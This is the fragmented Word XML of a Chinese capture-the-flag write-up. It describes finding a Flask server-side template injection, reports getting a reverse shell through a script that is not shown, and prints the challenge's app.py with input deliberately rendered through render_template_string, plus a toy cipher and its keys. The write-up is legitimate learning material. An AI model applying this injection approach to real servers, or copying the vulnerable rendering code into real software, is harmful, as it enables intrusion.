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C05E" w14:textId="4A3335B4" w:rsidR="00437A38" w:rsidRDefault="00740925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F150D5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>1504895347@qq.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3250845B" w14:textId="77777777" w:rsidR="00740925" w:rsidRDefault="00740925"/>
    <w:p w14:paraId="7B468359" w14:textId="0DB01850" w:rsidR="00740925" w:rsidRDefault="00740925">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web:</w:t>
      </w:r>
      <w:r w:rsidRPr="00740925">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 回来吧永远滴神</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4559D1A2" w14:textId="77777777" w:rsidR="00740925" w:rsidRDefault="00740925"/>
    <w:p w14:paraId="2D1646E3" w14:textId="67A77D6E" w:rsidR="00740925" w:rsidRDefault="00740925">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49480584" w14:textId="631A5042" w:rsidR="00740925" w:rsidRDefault="00740925">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网页叫我们提交问题答案，这个看比赛的应该都答得出来</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C864CC9" w14:textId="2059DCD8" w:rsidR="00740925" w:rsidRDefault="00740925">
      <w:r w:rsidRPr="00740925">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="327A1B78" wp14:editId="05E476CE">
            <wp:extent cx="5274310" cy="3455035"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="28513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4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EB9" w14:textId="199C0C71" w:rsidR="00740925" w:rsidRDefault="00740925">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后进入隐藏关卡</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00F150D5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://101.200.138.180:16356/evlelLL/646979696775616e，F</w:t>
        </w:r>
        <w:r w:rsidRPr="00F150D5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F974F9D" w14:textId="23571C61" w:rsidR="00740925" w:rsidRDefault="00740925">
      <w:r w:rsidRPr="00740925">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FE88915" wp14:editId="3901BC61">
            <wp:extent cx="5274310" cy="2508250"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="1993029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29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D57" w14:textId="519C8F14" w:rsidR="00740925" w:rsidRDefault="00740925">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个integrity属性十分不正常，一眼base64，解密它：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28566DA4" w14:textId="46184E49" w:rsidR="00740925" w:rsidRDefault="00740925">
      <w:r w:rsidRPr="00740925">
        <w:t>NDY2YzYxNjc1YjMwNWQzYTIwNDk3YjQ0NTM0YjM2NDY2YTM3NjM=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解密：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BFD99E" w14:textId="3411F141" w:rsidR="00740925" w:rsidRDefault="00740925">
      <w:r w:rsidRPr="00740925">
        <w:t>466c61675b305d3a20497b44534b36466a3763</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>十六进制转字符串：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3EEDA2" w14:textId="6287E1CB" w:rsidR="00740925" w:rsidRDefault="00740925">
      <w:r w:rsidRPr="00740925">
        <w:t>Flag[0]: I{DSK6Fj7c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778C109F" w14:textId="29D97AB7" w:rsidR="00740925" w:rsidRDefault="00740925">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到第一部分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637B78C3" w14:textId="77777777" w:rsidR="00740925" w:rsidRDefault="00740925"/>
    <w:p w14:paraId="51EB80C1" w14:textId="08FF2EA4" w:rsidR="00740925" w:rsidRDefault="00740925">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>然后再看输入框，试试ssti，发现{{}}被过滤了，那试试{%%</w:t>
      </w:r>
      <w:r>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，发现给出了提示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47273740" w14:textId="5B1691B2" w:rsidR="00740925" w:rsidRDefault="00CE429A">
      <w:r w:rsidRPr="00CE429A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BE03155" wp14:editId="0F7EDC51">
            <wp:extent cx="5274310" cy="1828165"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="268435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1B5E" w14:textId="3697A5F9" w:rsidR="00CE429A" w:rsidRDefault="00CE429A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看来是有ssti漏洞，试试{% print %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5154A0" w14:textId="3AEF0021" w:rsidR="00CE429A" w:rsidRDefault="00CE429A">
      <w:r w:rsidRPr="00CE429A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DE4C53B" wp14:editId="4FE3CE16">
            <wp:extent cx="5274310" cy="2466340"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="169935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2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D118" w14:textId="7F6D25CA" w:rsidR="00CE429A" w:rsidRDefault="00CE429A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确信了，这里用</w:t>
      </w:r>
      <w:r w:rsidR="00956FFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ssti.py</w:t>
      </w:r>
      <w:r w:rsidR="00A54BE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（脚本一）</w:t>
      </w:r>
      <w:r w:rsidR="00956FFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接梭哈反弹shell：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C413467" w14:textId="16AF46FC" w:rsidR="00956FFE" w:rsidRDefault="00937D58">
      <w:r w:rsidRPr="00937D58">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D42F2E2" wp14:editId="2C18159A">
            <wp:extent cx="5274310" cy="2185035"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="2137253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53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AE65" w14:textId="242F1BDD" w:rsidR="00956FFE" w:rsidRDefault="00956FFE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后发现两个离谱文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F440D8C" w14:textId="2A3BEE7F" w:rsidR="00956FFE" w:rsidRDefault="00956FFE">
      <w:r w:rsidRPr="00956FFE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58394B9D" wp14:editId="601FE7EA">
            <wp:extent cx="5274310" cy="2272030"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="18378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7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45C8" w14:textId="351D0424" w:rsidR="00CE429A" w:rsidRDefault="00956FFE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样拿到了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAFF659" w14:textId="0DB141E5" w:rsidR="00956FFE" w:rsidRDefault="00956FFE">
      <w:r w:rsidRPr="00956FFE">
        <w:t>Flag[1]: SHvVBCB9Xa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149407ED" w14:textId="25F39CCB" w:rsidR="00956FFE" w:rsidRDefault="00956FFE">
      <w:r w:rsidRPr="00956FFE">
        <w:t>Flag[2]: C5f_Y*4CI6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0161E6" w14:textId="332101E0" w:rsidR="00956FFE" w:rsidRDefault="00956FFE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找不到第三个，那就把app.py复制下来</w:t>
      </w:r>
      <w:r w:rsidR="006C105D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>审计一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8F6A5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flask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Flask, request, render_template, render_template_string, jsonify, session, redirect, url_for, current_app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEFFB0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level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level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507D15F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Flask(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import_name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9BFFB2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static_url_path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5129B8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static_folder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'static'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5E6334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template_folder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'templates'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4A40C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.secret_key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'GVASDGDJGHiAsdfgmkdfjAhSljkD.IjOdrgSsddggkhukDdHAGOTJSFGLDGSADASSGDFJGHKJFDG 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随机生成的安全秘钥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA4C4A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E19F04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'/index'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423759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4F62D24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# Session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存储在服务器上，而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Cookie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存储在用户浏览器上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2914D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session.pop(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'answers_correct'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中移除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'answers_correct'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键，否则返回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None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C11D81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render_template(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'index.html'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render_template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函数渲染并返回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模板</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639BF5F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'/submit-answers'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71372DF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submit_answers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6CEB298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请求中获取答案并判断是否与正确答案匹配</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A5274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answer1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request.form.get(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'answer1'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EE1167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answer2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request.form.get(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'answer2'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2822E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answer3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request.form.get(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'answer3'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D0F1C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correct_answers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'answer1'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'VN'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'answer2'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卡莎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'answer3'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小狗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D8600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如果全部匹配，设置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session 'answers_correct'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为真并返回一个表示成功的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响应</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E87C0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answer1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correct_answers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'answer1'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answer2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correct_answers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'answer2'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answer3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correct_answers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'answer3'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48EBEFA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session[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'answers_correct'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1E55362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jsonify(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success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0B4C4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如果不匹配，返回一个包含错误信息的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响应</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7974D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2975DE2" w14:textId="1E203638" w:rsidR="00956FFE" w:rsidRPr="00956FFE" w:rsidRDefault="00956FFE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jsonify(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对神的膜拜不够虔诚！伟大的神决定再给你一次机会，务必好好珍惜！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F96D9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'/evlelLL/&lt;path:hex_str&gt;'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52EED09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level1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hex_str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EC4FF4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检查用户是否已经通过验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568333F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session.get(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'answers_correct'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26E7D4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redirect(url_for(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'caught'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如果用户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中不存在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'answers_correct'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键（即未通过验证），重定向用户到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'caught'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路由对应的页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C7E24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decoded_str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在这里初始化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decoded_str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063FC7F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7E5F10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尝试将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进制字符串解码为字节，然后解码为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utf-8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格式的字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5C147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decoded_str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fromhex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hex_str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decode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6894C2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4EC9B0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ValueError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C3A6B5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如果出现解码错误，可能是因为提供的不是有效的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进制字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48351B9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3871073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14:paraId="632D9C4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decoded_str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'diyiguan'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7D0E91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48C0CD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decoded_str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'meixiangdaoba'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BD6B33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6A5DD2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423213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02BF718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request.method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如果当前请求是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方法，函数将渲染并返回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level.html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模板</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0573742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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393BDEC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恭喜你发现隐藏关卡！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8DE444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该提交什么呢？我可能会告诉你一些有用的信息喔！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</w:p>
    <w:p w14:paraId="11ED8FF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1B7BC9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不愧是你！第二关就在这里喔！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0CB7F0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这里需要输入的是什么呢？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</w:p>
    <w:p w14:paraId="79D4AE3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F2B83A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未知的关卡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366DFF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似乎走错了地方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CAA93B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render_template(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"level.html"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F0D77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087258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恭喜你！请同时收好通往最终虚空的第一条必备信息：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ch4Os_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\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n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BB8A84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custom_message_1_1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"ZTU4MWI3ZTU4MWI3ZTU5MThhZThhZjg5ZTRiZGEwZWZiYzhjZTU4NWI2ZTVhZTllZThiZjk4ZTY5Yzg5ZTU4ZmE2ZTVhNDk2ZTRiODgwZTU4NWIzZWZiYzgx"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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761D8B8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 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"NmQ2NTY5Nzg2OTYxNmU2NzY0NjE2ZjYyNjE="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667DC5A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custom_message_2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恭喜你！请同时收好通往最终虚空的第二条必备信息：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_xi4oHmdm"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02157AC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custom_message_3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将两条必备信息连接起来，然后访问吧！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D13101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request.form.get(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'iIsGod'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请求的表单数据中获取名为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iIsGod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的字段值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5CEAE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level_func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'level'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动态构建字符串，用于表示函数名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAC27E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call_obj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getattr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(level,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level_func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level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模块获取名为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level_func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的函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59848A6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call_obj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将获取到的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iIsGod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字段值作为参数传递给上述函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBE3E5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current_app.logger.info(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攻击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Payload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Flask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的日志记录功能打印结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396A522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render_template_string(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神说：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将执行结果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res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嵌入到字符串中，并使用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render_template_string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渲染</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDE144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render_template_string(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BDDD6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current_app.logger.info(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回显内容：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Flask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的日志记录功能打印结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E2EBC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添加不同关卡的回显逻辑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7B9F0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"Flag[1]:"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"_frozen_importlib_external.FileLoader"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"[&amp;#39;&amp;lt;&amp;#39;, &amp;#39;C&amp;#39;, &amp;#39;o&amp;#39;, &amp;#39;n&amp;#39;, &amp;#39;f&amp;#39;, &amp;#39;i&amp;#39;, &amp;#39;g&amp;#39;,"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39003A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# if lev == 1: # debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E8845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    current_app.logger.info(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第一关的安全结果：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129EEA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"Flag[1]:"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0B619F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custom_message_1_1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5510197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5AE9FA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lev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"Flag[2]:"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730DD2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6A9955"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t># elif lev == 2: # debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A1268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    current_app.logger.info(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第二关的安全结果：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950624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"Flag[2]:"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BD66DE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custom_message_2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custom_message_3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C43B87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rendered_content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D07D2B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02BA68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神说：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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459F452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           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Segoe UI Emoji" w:eastAsia="宋体" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>🎉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看来你的努力已经看到了回报呢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~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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2DD6E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           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Segoe UI Emoji" w:eastAsia="宋体" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>😺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但是，就像猫咪对着悬挂的线团，有些秘密是触碰不得的喵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~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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B99D93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           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Segoe UI Emoji" w:eastAsia="宋体" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>🌟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我赞赏你的聪明才智，但秘密还是秘密，不可以全部告诉你喔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~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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782F24D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>                   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Segoe UI Emoji" w:eastAsia="宋体" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>😉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继续探索吧，谁知道下一个转角会遇见什么呢？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3A6253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7EEEE1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好像不太对，再试试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~"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0432031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'/caught'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DAE3FF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caught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70D789D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逮到你了！不可以在未经允许的情况下访问喵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~"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CFEB0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'/ch4Os__xi4oHmdm'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1E78310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CDCAA"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>chaos_1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03FCB57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html_content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10C9DE9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&lt;pre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6BEF5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from Crypto.Util.Padding import pad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CA8D5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from Crypto.Util.number import bytes_to_long as b2l, long_to_bytes as l2b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039D122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from Crypto.Random import get_random_bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCF44C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from enum import Enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198F615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class Mode(Enum):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C96EE0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ECB = 0x01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3537243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CBC = 0x02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F75345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CFB = 0x03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E669A3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class Cipher:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7137264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def __init__(self, key, iv=None):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC4DDE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self.BLOCK_SIZE = 64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A815B2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self.KEY = [b2l(key[i:i+self.BLOCK_SIZE//16]) for i in range(0, len(key), self.BLOCK_SIZE//16)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F92D39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self.DELTA = 0x9e3779b9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECC1B6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self.IV = iv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0744063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self.ROUNDS = 64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AEACD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if self.IV:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6328A30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self.mode = Mode.CBC if iv else Mode.ECB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2903C40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if len(self.IV) * 8 != self.BLOCK_SIZE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1083EAA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self.mode = Mode.CFB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCDE5A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def _xor(self, a, b):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F0217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return b''.join(bytes([_a ^ _b]) for _a, _b in zip(a, b))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F40BE5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lastRenderedPageBreak/>
        <w:t>    def encrypt_block(self, msg):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D360A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m0 = b2l(msg[:4])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552FDE7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m1 = b2l(msg[4:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2876D93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msk = (1 &lt;&lt; (self.BLOCK_SIZE//2)) - 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7279011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s = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272B492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for i in range(self.ROUNDS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A19AB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s += self.DELTA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB8E72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m0 += ((m1 &lt;&lt; 4) + self.KEY[i % len(self.KEY)]) ^ (m1 + s) ^ ((m1 &gt;&gt; 5) + self.KEY[(i+1) % len(self.KEY)])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C895F8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m0 &amp;= msk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2257A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m1 += ((m0 &lt;&lt; 4) + self.KEY[(i+2) % len(self.KEY)]) ^ (m0 + s) ^ ((m0 &gt;&gt; 5) + self.KEY[(i+3) % len(self.KEY)])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598A19C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m1 &amp;= msk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220AEAD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return l2b((m0 &lt;&lt; (self.BLOCK_SIZE//2)) | m1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DFF8E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def encrypt(self, msg):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065C4B4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msg = pad(msg, self.BLOCK_SIZE//8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC08D5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blocks = [msg[i:i+self.BLOCK_SIZE//8] for i in range(0, len(msg), self.BLOCK_SIZE//8)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFB962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ct = b''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BB411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if self.mode == Mode.ECB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBBCAF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for pt in blocks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356662D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ct += self.encrypt_block(pt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EB78F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elif self.mode == Mode.CBC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8BD2B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X = self.IV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E20ECB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for pt in blocks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0026D22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enc_block = self.encrypt_block(self._xor(X, pt))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C59AEC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ct += enc_block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479335D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X = enc_block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7584E1F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elif self.mode == Mode.CFB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DD229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X = self.IV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8593E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for pt in blocks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1288384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output = self.encrypt_block(X)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE48F9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enc_block = self._xor(output, pt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7165F88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ct += enc_block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFC87B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        X = enc_block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EE8F1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    return ct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF4D7B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if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B05AB8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KEY = get_random_bytes(16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13923EA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IV = get_random_bytes(8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7B242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cipher = Cipher(KEY, IV)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B26B39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FLAG = b'xxxxxxxxxxxxxxxxxxx'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C3EC4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ct = cipher.encrypt(FLAG)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454C9D3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# KEY: 3362623866656338306539313238353733373566366338383563666264386133</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273801A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    print(f'KEY: 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{{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KEY.hex()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}}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')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA41FC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# IV: 64343537373337663034346462393931</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7563493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 xml:space="preserve">    print(f'IV: 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{{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IV.hex()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}}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')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFD9B5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# Ciphertext: 1cb8db8cabe8edbbddb236d5eb6f0cdeb610e9af855b52d3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283D9EA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 xml:space="preserve">    print(f'Ciphertext: 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{{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ct.hex()</w:t>
      </w:r>
      <w:r w:rsidRPr="00956FFE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
      <w:r w:rsidRPr="00956FFE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFBD66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&lt;/pre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5D7C5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E9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>    '''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6379168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56F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6F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56FFE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>html_content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37617CE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@app.route('/encrypt', methods=['GET'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32007CA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def chaos_2():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BC213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link = url_for('content', _external=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6752F41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code_content = f"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746A667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# -*- coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EA2D8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from &lt;a href="{link}" style="text-decoration: none; color: black; cursor: text;"&gt;ISCC&lt;/a&gt; import ISCC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E1CB1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import base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3927E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secret_key = "00chaos00crypto00kyuyu00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABC3D4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iscc = &lt;a href="{link}" style="text-decoration: none; color: black; cursor: text;"&gt;ISCC&lt;/a&gt;(secret_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5288AD4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flag = "Flag[3]:              xxxxxxxxxx"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606B813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ciphertext = iscc.encrypt(flag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1749C6D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print base64.b64encode(ciphertext)</w:t>
